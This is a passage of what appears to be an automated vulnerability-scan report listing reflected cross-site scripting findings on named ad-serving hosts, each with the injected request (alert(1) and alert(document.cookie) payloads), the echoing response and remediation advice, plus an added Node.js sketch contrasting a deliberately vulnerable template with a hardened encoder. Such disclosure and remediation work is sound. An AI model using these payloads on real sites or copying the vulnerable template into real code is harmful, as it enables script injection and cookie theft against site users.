Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the click-through URL has to be embedded in the creative, encode it for each context it passes through: percent-encode it as a query-string value before it is placed in the href, then emit the finished markup as a JavaScript string literal through a JSON/JS string encoder (escaping ", \, <, > and U+2028/U+2029) instead of concatenating it into the source.

Request

GET /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-2%3Fmpt%3D%25r3d142"%3balert(1)//eee3dea5e8d&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141134;x=1793;c=203681169,203681169;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:27:21 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:25 GMT
ETag: "5bff41-bfd-49ab3f6116040"
Accept-Ranges: bytes
Content-Length: 7177
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
</script>d97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k=http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-2?mpt=%r3d142";alert(1)//eee3dea5e8d\" target=\"_blank\">
...[SNIP]...
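
Added example (not code from the report or from Mediaplex): a Node.js sketch of how a server ends up with the string seen in the response above, with mpck concatenated into the JavaScript source of the creative, next to a hardened version that encodes for the URL, HTML and JavaScript contexts in turn, and a small harness that executes the generated source with alert replaced by a recorder. The template shape and the k= parameter are assumptions; the mpck value is the scanner's payload from this issue, URL-decoded as the server would receive it.

```javascript
// Added example, not code from the original report or from Mediaplex: a
// minimal imitation of a server that interpolates the mpck click-through URL
// into the JavaScript source of an ad creative, beside a hardened version.
// The template shape and the 'k=' query parameter are assumptions; the mpck
// value is the scanner's payload from issue 3.29, URL-decoded as the server
// would see it.

const MPCK_PAYLOAD =
  'altfarm.mediaplex.com/ad/ck/12309-121202-25586-2?mpt=%r3d142";alert(1)//eee3dea5e8d';

// Vulnerable template: mpck is pasted raw into a double-quoted JS string that
// itself carries escaped HTML attribute quotes (\" target=\"_blank\"). The
// unescaped " in the payload ends the literal and the // swallows the rest of
// the line, exactly as in the report's response.
function buildCreativeJsVulnerable(mpck) {
  return 'var mp_html = "";\n' +
    'mp_html += "<a href=\\"http://o1.qnsr.com//cgi/c?k=' + mpck +
    '\\" target=\\"_blank\\">";\n';
}

// JavaScript string literal encoder. JSON.stringify escapes quotes, backslashes
// and control characters; the extra replacements keep the literal inert if the
// source is ever inlined in a <script> block and in engines that still treat
// U+2028/U+2029 as line terminators.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened template: encode for each context in the order the data passes
// through them. The click URL is a query-string value (percent-encode it), the
// result is HTML (build the markup as a plain string), and the markup is then
// embedded in JS source (emit it as a proper string literal).
function buildCreativeJsHardened(mpck) {
  const clickUrl = 'http://o1.qnsr.com//cgi/c?k=' + encodeURIComponent(mpck);
  const anchor = '<a href="' + clickUrl + '" target="_blank">';
  return 'var mp_html = "";\nmp_html += ' + jsStringLiteral(anchor) + ';\n';
}

// Execute the generated creative the way a browser would, with alert replaced
// by a recorder, and report what the script actually did.
function runCreative(jsSource) {
  const alertCalls = [];
  const fakeAlert = (x) => alertCalls.push(x);
  let mpHtml = null;
  let error = null;
  try {
    mpHtml = new Function('alert', jsSource + '\nreturn mp_html;')(fakeAlert);
  } catch (e) {
    error = e.constructor.name;
  }
  return { mpHtml, alertCalls, error };
}
```

Running the vulnerable source calls the recorder once and leaves mp_html truncated at the payload's quote, which is the behaviour the scanner reported; the hardened source builds the full anchor with the payload percent-encoded inside the k= value and never leaves the string literal. Percent-encoding is what does the heavy lifting here: it removes the quote, semicolon and slashes from the value before either of the outer encoders sees it.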

3.30. http://img.mediaplex.com/content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af630"%3balert(1)//5d7a8e72841 was submitted in the mpvc parameter. This input was echoed as af630";alert(1)//5d7a8e72841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the clickTAG URL has to be embedded in the creative, encode it for each context it passes through: percent-encode it as a query-string value before it is placed in the markup, then emit the finished markup as a JavaScript string literal through a JSON/JS string encoder (escaping ", \, <, > and U+2028/U+2029) instead of concatenating it into the source.

Request

GET /content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-2%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141134;x=1793;c=203681169,203681169;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k=af630"%3balert(1)//5d7a8e72841 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:27:24 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:25 GMT
ETag: "5bff41-bfd-49ab3f6116040"
Accept-Ranges: bytes
Content-Length: 7153
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
</script>d97a1fbd30c=1;;e=i;s=9538;g=172;w=56;m=0;z=9250812986;k=af630";alert(1)//5d7a8e72841http://altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-2%3Fmpt%3D%25r&clickTag=http://o1.qnsr.com//cgi/c?a=20141134;x=1793;c=203681169,203681169;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/abou
...[SNIP]...

3.31. http://img.mediaplex.com/content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e55af"%3balert(1)//56a40f07ee4 was submitted in the mpck parameter. This input was echoed as e55af";alert(1)//56a40f07ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the click-through URL has to be embedded in the creative, encode it for each context it passes through: percent-encode it as a query-string value before it is placed in the href, then emit the finished markup as a JavaScript string literal through a JSON/JS string encoder (escaping ", \, <, > and U+2028/U+2029) instead of concatenating it into the source.

Request

GET /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-1%3Fmpt%3D%25re55af"%3balert(1)//56a40f07ee4&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:08 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:16 GMT
ETag: "3b3dad-bfd-49ab3f5880c00"
Accept-Ranges: bytes
Content-Length: 6150
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
m//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k=http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-1?mpt=%re55af";alert(1)//56a40f07ee4\" target=\"_blank\">
...[SNIP]...

3.32. http://img.mediaplex.com/content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c132"%3balert(1)//d6444155405 was submitted in the mpvc parameter. This input was echoed as 9c132";alert(1)//d6444155405 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response below shows the string forming the FlashVars clickTAG value of a <PARAM> element, so the same value is at once a JavaScript string break, an HTML attribute value and a URL handed to the Flash movie; the mpvc value is also concatenated directly ahead of the mpck value (k=...payload...http://altfarm.mediaplex.com...), so the two parameters land in one string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the clickTAG URL has to be embedded in the creative, encode it for each context it passes through: percent-encode it as a query-string value before it is placed in the markup, then emit the finished markup as a JavaScript string literal through a JSON/JS string encoder (escaping ", \, <, > and U+2028/U+2029) instead of concatenating it into the source.

Request

GET /content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-1%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k=9c132"%3balert(1)//d6444155405 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:27 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:16 GMT
ETag: "3b3dad-bfd-49ab3f5880c00"
Accept-Ranges: bytes
Content-Length: 6126
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=5213641310;k=9c132";alert(1)//d6444155405http://altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-1%3Fmpt%3D%25r&clickTag=http://o1.qnsr.com//cgi/c?a=20141126;x=2305;c=203695825,203695825;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=
...[SNIP]...

3.33. http://img.mediaplex.com/content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8f7"%3balert(1)//b499e39d0ce was submitted in the mpck parameter. This input was echoed as 1f8f7";alert(1)//b499e39d0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the click-through URL has to be embedded in the creative, encode it for each context it passes through: percent-encode it as a query-string value before it is placed in the href, then emit the finished markup as a JavaScript string literal through a JSON/JS string encoder (escaping ", \, <, > and U+2028/U+2029) instead of concatenating it into the source.

Request

GET /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-0%3Fmpt%3D%25r1f8f7"%3balert(1)//b499e39d0ce&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:24 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:06 GMT
ETag: "3b3daa-bf5-49ab3f4ef7580"
Accept-Ranges: bytes
Content-Length: 6142
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
m//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k=http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-0?mpt=%r1f8f7";alert(1)//b499e39d0ce\" target=\"_blank\">
...[SNIP]...

3.34. http://img.mediaplex.com/content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b950"%3balert(1)//36978161dc7 was submitted in the mpvc parameter. This input was echoed as 1b950";alert(1)//36978161dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the clickTAG URL has to be embedded in the creative, encode it for each context it passes through: percent-encode it as a query-string value before it is placed in the markup, then emit the finished markup as a JavaScript string literal through a JSON/JS string encoder (escaping ", \, <, > and U+2028/U+2029) instead of concatenating it into the source.

Request

GET /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-0%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k=1b950"%3balert(1)//36978161dc7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:42 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:06 GMT
ETag: "3b3daa-bf5-49ab3f4ef7580"
Accept-Ranges: bytes
Content-Length: 6118
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k=1b950";alert(1)//36978161dc7http://altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-0%3Fmpt%3D%25r&clickTag=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=
...[SNIP]...

3.35. http://intranetjournal.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9eced%3balert(1)//957d74fd0a9 was submitted in the jscallback parameter. This input was echoed as 9eced;alert(1)//957d74fd0a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. One caveat on the payload as shown: the server wraps the callback in try{ ... }catch(e){} on a single line, so the trailing // comments out the closing }catch(e){} and the response below is a syntax error rather than an executing script. The injection point itself is real and unescaped (a classic JSONP callback reflection); a payload that leaves the surrounding statement syntactically complete would execute.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If the callback name has to come from the request, validate it against a strict allowlist (a dotted chain of JavaScript identifiers, e.g. ^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$, with a length cap), fall back to a fixed default name when validation fails, and serve the response with a script MIME type and X-Content-Type-Options: nosniff.

Request

GET /al.asp?ts=20110218152936&cc=us&hk=1&ipid=26006&mh=4ccbd227c914fe0ad20c83f2c32d6d2d&pvm=91e816d4e263650ab854db91045f7b68&pvu=221E92B9864D44419082D8D9A665E825&rcc=us&so=0&prf=ll%3A550%7Cintl%3A1818%7Cpreprochrome%3A4%7Cgetconchrome%3A262%7Ccontint%3A38513%7Ccontl%3A40599%7Cadvint%3A1275%7Cadvl%3A41874%7Ctl%3A41874&jscallback=$iTXT.js.callback319eced%3balert(1)//957d74fd0a9 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:29:04 GMT; Path=/
Content-Type: text/javascript
Content-Length: 66
Date: Fri, 18 Feb 2011 15:29:04 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback319eced;alert(1)//957d74fd0a9();}catch(e){}

3.36. http://intranetjournal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ffa8'-alert(1)-'e8073eb4a9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The payload closes the single-quoted pageQuery string and uses subtraction so that the resulting statement, $iTXT.js.pageQuery='ipid=26006&2ffa8'-alert(1)-'e8073eb4a9e=1';, remains valid JavaScript: alert(1) is evaluated as an operand when the script runs. Note that the whole request query string, parameter names included, is reflected here, not just one value.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If the page's query string has to be exposed to the script, emit it as a JSON-encoded string literal (with <, > and U+2028/U+2029 escaped as well) instead of splicing it between single quotes, or let the client-side code read location.search itself rather than having the server echo it.

Request

GET /intellitxt/front.asp?ipid=26006&2ffa8'-alert(1)-'e8073eb4a9e=1 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wcAAAEuOWEglgA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWIx3AA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:27:39 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWIx3QA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:27:39 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:27:39 GMT
Age: 0
Connection: keep-alive
Content-Length: 10605

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
p://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218152739";})();$iTXT.js.serverUrl='http://intranetjournal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26006&2ffa8'-alert(1)-'e8073eb4a9e=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.37. http://intranetjournal.us.intellitxt.com/v4/advert [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31dd1%3balert(1)//9f86d76e19c was submitted in the jscallback parameter. This input was echoed as 31dd1;alert(1)//9f86d76e19c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with issue 3.35, the callback is wrapped in try{ ... }catch(e){} on one line, so the // in this particular payload comments out the closing }catch(e){} and the response below fails to parse; the reflection is nonetheless unescaped, and a payload that keeps the statement syntactically complete would execute.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If the callback name has to come from the request, validate it against a strict allowlist (a dotted chain of JavaScript identifiers, with a length cap), fall back to a fixed default name when validation fails, and serve the response with a script MIME type and X-Content-Type-Options: nosniff.

Request

GET /v4/advert?ts=1298042975642&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&sid=4ccbd227c914fe0ad20c83f2c32d6d2d&pvu=221E92B9864D44419082D8D9A665E825&pvm=91e816d4e263650ab854db91045f7b68&ipid=26006&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback3031dd1%3balert(1)//9f86d76e19c HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 156
Date: Fri, 18 Feb 2011 15:29:17 GMT
Age: 0
Connection: keep-alive

(function(){})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback3031dd1;alert(1)//9f86d76e19c();}catch(e){}

3.38. http://intranetjournal.us.intellitxt.com/v4/context [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f6fe4%3balert(1)//4bff4cebd35 was submitted in the jscallback parameter. This input was echoed as f6fe4;alert(1)//4bff4cebd35 in the application's response.

